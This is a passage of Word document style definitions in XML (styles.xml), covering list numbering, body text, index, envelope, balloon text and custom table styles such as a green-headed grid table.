    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="6"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber3Level3">
    <w:name w:val="List Number 3 (Level 3)"/>
    <w:basedOn w:val="Text3"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="6"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber3Level4">
    <w:name w:val="List Number 3 (Level 4)"/>
    <w:basedOn w:val="Text3"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="6"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber4Level2">
    <w:name w:val="List Number 4 (Level 2)"/>
    <w:basedOn w:val="Text4"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="907"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber4Level3">
    <w:name w:val="List Number 4 (Level 3)"/>
    <w:basedOn w:val="Text4"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1361"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber4Level4">
    <w:name w:val="List Number 4 (Level 4)"/>
    <w:basedOn w:val="Text4"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1814"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Disclaimer">
    <w:name w:val="Disclaimer"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:keepLines/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="480" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading1Annex">
    <w:name w:val="Heading 1 Annex"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:overflowPunct w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="240" w:after="240"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps w:val="0"/>
      <w:noProof/>
      <w:sz w:val="36"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BlockText">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1440" w:right="1440"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyText2Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText2Char">
    <w:name w:val="Body Text 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText2"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyText3Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText3Char">
    <w:name w:val="Body Text 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText3"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextFirstIndent">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="BodyText"/>
    <w:link w:val="BodyTextFirstIndentChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:firstLine="210"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextFirstIndentChar">
    <w:name w:val="Body Text First Indent Char"/>
    <w:basedOn w:val="BodyTextChar"/>
    <w:link w:val="BodyTextFirstIndent"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndentChar">
    <w:name w:val="Body Text Indent Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextFirstIndent2">
    <w:name w:val="Body Text First Indent 2"/>
    <w:basedOn w:val="BodyTextIndent"/>
    <w:link w:val="BodyTextFirstIndent2Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:firstLine="210"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextFirstIndent2Char">
    <w:name w:val="Body Text First Indent 2 Char"/>
    <w:basedOn w:val="BodyTextIndentChar"/>
    <w:link w:val="BodyTextFirstIndent2"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent2">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndent2Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndent2Char">
    <w:name w:val="Body Text Indent 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent2"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent3">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndent3Char"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndent3Char">
    <w:name w:val="Body Text Indent 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent3"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DocumentMap">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DocumentMapChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DocumentMapChar">
    <w:name w:val="Document Map Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="DocumentMap"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteReference">
    <w:name w:val="endnote reference"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EnvelopeAddress">
    <w:name w:val="envelope address"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:framePr w:w="7920" w:h="1980" w:hRule="exact" w:hSpace="180" w:wrap="auto" w:hAnchor="page" w:xAlign="center" w:yAlign="bottom"/>
      <w:ind w:left="2880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EnvelopeReturn">
    <w:name w:val="envelope return"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="240" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="480" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="720" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="960" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1200" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1440" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1680" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1920" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="2160" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Index1"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="LineNumber">
    <w:name w:val="line number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="283" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List2">
    <w:name w:val="List 2"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="566" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List3">
    <w:name w:val="List 3"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="849" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List4">
    <w:name w:val="List 4"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1132" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List5">
    <w:name w:val="List 5"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="1415" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="MessageHeader">
    <w:name w:val="Message Header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="MessageHeaderChar"/>
    <w:locked/>
    <w:rsid w:val="0071072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lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MessageHeaderChar">
    <w:name w:val="Message Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="MessageHeader"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:shd w:val="pct20" w:color="auto" w:fill="auto"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalIndent">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoteHeading">
    <w:name w:val="Note Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="NoteHeadingChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoteHeadingChar">
    <w:name w:val="Note Heading Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoteHeading"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Salutation">
    <w:name w:val="Salutation"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SalutationChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SalutationChar">
    <w:name w:val="Salutation Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Salutation"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FooterLine">
    <w:name w:val="FooterLine"/>
    <w:basedOn w:val="Footer"/>
    <w:next w:val="Footer"/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="LightList">
    <w:name w:val="Light List"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Mincho" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang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ar2">
    <w:name w:val="Calendar 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Mincho" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="95B3D7"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:ascii="Bahnschrift SemiCondensed" w:hAnsi="Bahnschrift SemiCondensed"/>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table" w:customStyle="1" w:styleId="DDGreenTable">
    <w:name w:val="DD Green Table"/>
    <w:basedOn w:val="LightGrid-Accent3"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="6A6A6A"/>
      <w:sz w:val="18"/>
      <w:lang w:val="en-US" w:eastAsia="en-IE"/>
    </w:rPr>
    <w:tblPr>
      <w:tblInd w:w="864" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:left w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:bottom w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:right w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:insideH w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:insideV w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Bahnschrift SemiCondensed" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift SemiCondensed" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="19"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="59BB24"/>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6A6A6A"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>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6A6A6A"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="LightGrid-Accent3">
    <w:name w:val="Light Grid Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:lang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eastAsia="Times New Roman"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TableGrid8">
    <w:name w:val="Table Grid 8"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz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Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:uiPriority w:val="1"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="classtext">
    <w:name w:val="classtext"/>
